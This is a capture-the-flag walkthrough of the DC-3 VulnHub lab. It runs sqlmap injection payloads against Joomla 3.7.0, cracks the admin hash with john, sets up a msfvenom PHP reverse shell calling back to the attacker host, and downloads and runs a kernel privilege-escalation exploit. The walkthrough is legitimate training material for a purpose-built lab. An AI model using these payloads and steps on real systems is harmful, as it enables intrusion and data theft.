DC-3 Walkthrough

Description from Vulnhub

DC-3 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

As with the previous DC releases, this one is designed with beginners in mind, although this time around, there is only one flag, one entry point and no clues at all.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won’t give you the answer, instead, I’ll give you an idea about how to move forward.

For those with experience doing CTF and Boot2Root challenges, this probably won’t take you long at all (in fact, it could take you less than 20 minutes easily).

If that’s the case, and if you want it to be a bit more of a challenge, you can always redo the challenge and explore other ways of gaining root and obtaining the flag.

Scanning

After the initial port scanning, I discovered only one port. It looks like a CMS, more specifically Joomla.

root :: ~/Downloads » nmap -A -p- 192.168.43.207
Nmap scan report for DC-3 (192.168.43.207)
Host is up (0.0020s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home

Enumeration

I ran joomscan on the site, which is a popular Joomla scanner. I was able to determine the version and locate the administrator page. That’s all.

root :: ~/Downloads » joomscan --url 192.168.43.207
    ____  _____  _____  __  __  ___   ___    __    _  _
(_  _)(  _  )(  _  )(  \/  )/ __) / __)  /__\  ( \( )
.-_)(   )(_)(  )(_)(  )    ( \__ \( (__  /(__)\  )  (
\____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_)
            (1337.today)

    --=[OWASP JoomScan
    +---++---==[Version : 0.0.7
    +---++---==[Update Date : [2018/09/23]
    +---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo
    --=[Code name : Self Challenge
    @OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP

Processing http://192.168.43.207 ...

[+] FireWall Detector
[++] Firewall not detected

[+] Detecting Joomla Version
[++] Joomla 3.7.0

[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable

[+] Checking Directory Listing
[++] directory has directory listing :
http://192.168.43.207/administrator/components
http://192.168.43.207/administrator/modules
http://192.168.43.207/administrator/templates
http://192.168.43.207/images/banners


[+] Checking apache info/status files
[++] Readable info/status files are not found

[+] admin finder
[++] Admin page : http://192.168.43.207/administrator/

[+] Checking robots.txt existing
[++] robots.txt is not found

[+] Finding common backup files name
[++] Backup files are not found

[+] Finding common log files name
[++] error log is not found

[+] Checking sensitive config.php.x file
[++] Readable config files are not found

There is not much clue to follow, so let’s search for the version number.

root :: ~/Downloads » searchsploit Joomla 3.7.0
------------------------------------------- ----------------------------------------
Exploit Title                              |  Path
                                           | (/usr/share/exploitdb/)
------------------------------------------- ----------------------------------------
Joomla! 3.7.0 - 'com_fields' SQL Injection | exploits/php/webapps/42033.txt
------------------------------------------- ----------------------------------------
Shellcodes: No Result

Now, we’re going somewhere… I mirrored the text file to my home directory and printed its content out.

root :: ~/Downloads » searchsploit -m exploits/php/webapps/42033.txt
Exploit: Joomla! 3.7.0 - 'com_fields' SQL Injection
    URL: https://www.exploit-db.com/exploits/42033
    Path: /usr/share/exploitdb/exploits/php/webapps/42033.txt
File Type: ASCII text, with CRLF line terminators

Copied to: /root/42033.txt

root :: /root » cat 42033.txt
# Exploit Title: Joomla 3.7.0 - Sql Injection
# Date: 05-19-2017
# Exploit Author: Mateus Lino
# Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
# Vendor Homepage: https://www.joomla.org/
# Version: = 3.7.0
# Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux
# CVE : - CVE-2017-8917

URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27

Using Sqlmap:

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

Parameter: list[fullordering] (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (DUAL)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(CASE WHEN (1573=1573) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)

    Type: error-based
    Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 6600 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (ELT(6600=6600,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT * FROM (SELECT(SLEEP(5)))GDiu)

Exploiting an SQL Injection

The author included an example with sqlmap and I made use of that line. I copied it, but modified the IP address, removed the --dbs and -p list[fullordering] switch and added the --dump for dumping the database. I cut out a lot of the output because it would be way too much.

root :: ~ » sqlmap -u "http://192.168.43.207/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dump

--- snip ---

[12:27:55] [WARNING] unable to retrieve column names for table '#__users' in database 'joomladb'
do you want to use common column existence check? [y/N/q] y
which common columns (wordlist) file do you want to use?
[1] default '/usr/local/Cellar/sqlmap/1.3.5/libexec/txt/common-columns.txt' (press Enter)
[2] custom
[12:28:01] [INFO] checking column existence using items from '/usr/local/Cellar/sqlmap/1.3.5/libexec/txt/common-columns.txt'
[12:28:01] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)] 5
[12:28:05] [INFO] starting 5 threads
[12:28:05] [INFO] retrieved: id
[12:28:05] [INFO] retrieved: name
[12:28:05] [INFO] retrieved: username
[12:28:05] [INFO] retrieved: email
[12:28:08] [INFO] retrieved: password
[12:28:40] [INFO] retrieved: params

[12:28:49] [INFO] fetching entries for table '#__users' in database 'joomladb'
[12:28:49] [INFO] used SQL query returns 1 entry
[12:28:49] [INFO] retrieved: 'freddy@norealaddress.net'
[12:28:49] [INFO] retrieved: '629'
[12:28:49] [INFO] retrieved: 'admin'
[12:28:49] [INFO] retrieved: '{"admin_style":"","admin_language":"","language":"","editor":"","helpsite":"","timezone":""}'
[12:28:49] [INFO] retrieved: '$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu'
[12:28:49] [INFO] retrieved: 'admin'
Database: joomladb
Table: #__users

After checking the columns of the #__users table, sqlmap printed out everything related to the admin user.

Cracking the hash

I let john crack the hash. The process was extremely fast and I got the admin password.

root :: ~ » nvim hash.txt
root :: ~ » john hash.txt
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
snoopy           (?)
1g 0:00:00:00 DONE 2/3 (2019-06-02 10:41) 2.272g/s 81.81p/s 81.81c/s 81.81C/s a1b2c3..buster
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Reverse shell

I quickly generated a PHP reverse shell with msfvenom.

root :: ~/Downloads » msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.2 LPORT=9898 -f raw > shell.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1113 bytes

Before uploading the reverse shell, I also set up the corresponding handler with Metasploit.

msf5 > use multi/handler
msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.43.2
lhost => 192.168.43.2
msf5 exploit(multi/handler) > set lport 9898
lport => 9898
msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.43.2:9898

Then, I navigated to 192.168.43.207/templates/protostar/shell.php and got a connection back.

Privilege escalation

I usually go for the LinEnum.sh shell script for exploring the interesting things on the box.

meterpreter > cd /tmp
meterpreter > shell
Process 1624 created.
Channel 0 created.
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
--2019-06-02 22:39:19--  https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.12.133, 64:ff9b::9765:7085
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.12.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 45639 (45K) [text/plain]
Saving to: 'LinEnum.sh'

    0K .......... .......... .......... .......... ....      100%  450K=0.1s

2019-06-02 22:39:20 (450 KB/s) - 'LinEnum.sh' saved [45639/45639]

chmod +x LinEnum.sh
./LinEnum.sh

I couldn’t find misconfigured services, SUID executables, etc… So, it was time to search for version numbers again. Maybe I’ll find a kernel exploit?! I copied the relevant information from the script output.

[-] Kernel information:
Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux


[-] Kernel information (continued):
Linux version 4.4.0-21-generic (buildd@lgw01-06) (gcc version 5.3.1 20160413 (Ubuntu 5.3.1-14ubuntu2) ) #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016


[-] Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04 LTS"
NAME="Ubuntu"
VERSION="16.04 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
UBUNTU_CODENAME=xenial

Searching for kernel exploit

I search for the distribution release number and added the term exploitdb. The second search result looked promising, so I decided to try it out! Here is the link: https://www.exploit-db.com/exploits/39772 The description is very straightforward, it even gives you the necessary files (link at the end) and usage example.

I was operating with a non-interactive shell, so I upgraded it to pseudo-TTY with Python and downloaded the exploit files.

python -c "import pty;pty.spawn('/bin/bash')"
www-data@DC-3:/tmp$ wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
<-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
--2019-06-02 22:53:57--  https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
Resolving github.com (github.com)... 140.82.118.3, 64:ff9b::8c52:7603
Connecting to github.com (github.com)|140.82.118.3|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/39772.zip [following]
--2019-06-02 22:53:58--  https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/39772.zip
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.112.133, 64:ff9b::9765:7085
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.112.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7025 (6.9K) [application/zip]
Saving to: '39772.zip'

39772.zip           100%[===================>]   6.86K  --.-KB/s    in 0s

2019-06-02 22:53:59 (66.1 MB/s) - '39772.zip' saved [7025/7025]

www-data@DC-3:/tmp$ 

Since we got a zipped file, we have to extract it.

www-data@DC-3:/tmp$ unzip 39772.zip
Archive:  39772.zip
creating: 39772/
inflating: 39772/.DS_Store
creating: __MACOSX/
creating: __MACOSX/39772/
inflating: __MACOSX/39772/._.DS_Store
inflating: 39772/crasher.tar
inflating: __MACOSX/39772/._crasher.tar
inflating: 39772/exploit.tar
inflating: __MACOSX/39772/._exploit.tar
www-data@DC-3:/tmp$ cd 39772
www-data@DC-3:/tmp/39772$ ls
crasher.tar  exploit.tar

We have to extract the exploit.tar file too.

www-data@DC-3:/tmp/39772$ tar xvf exploit.tar
ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c
www-data@DC-3:/tmp/39772$ ls
crasher.tar  ebpf_mapfd_doubleput_exploit  exploit.tar
www-data@DC-3:/tmp/39772$ cd ebpf_mapfd_doubleput_exploit
www-data@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
compile.sh  doubleput.c  hello.c  suidhelper.c

I got all the required files, time to compile the exploit.

www-data@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh
doubleput.c: In function 'make_setuid':
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
    .insns = (__aligned_u64) insns,
            ^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
    .license = (__aligned_u64)""
            ^

Finally, run the exploit and hope for the best!

www-data@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit# whoami;id
root
uid=0(root) gid=0(root) groups=0(root),33(www-data)

The exploit was successful and I got root privileges. Yayyy! Now, let’s get the flag!

root@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit# cd /root
root@DC-3:/root# ls
the-flag.txt
root@DC-3:/root# cat the-flag.txt
__        __   _ _   ____                   _ _ _ _
\ \      / /__| | | |  _ \  ___  _ __   ___| | | | |
\ \ /\ / / _ \ | | | | | |/ _ \| '_ \ / _ \ | | | |
\ V  V /  __/ | | | |_| | (_) | | | |  __/_|_|_|_|
    \_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_)


Congratulations are in order.  :-)

I hope you've enjoyed this challenge as I enjoyed making it.

If there are any ways that I can improve these little challenges,
please let me know.

As per usual, comments and complaints can be sent via Twitter to @DCAU7

Have a great day!!!!
root@DC-3:/root#

Before you go

If you found this article helpful, please share to help others with similar interest find it! + Feedback and donations are always welcome!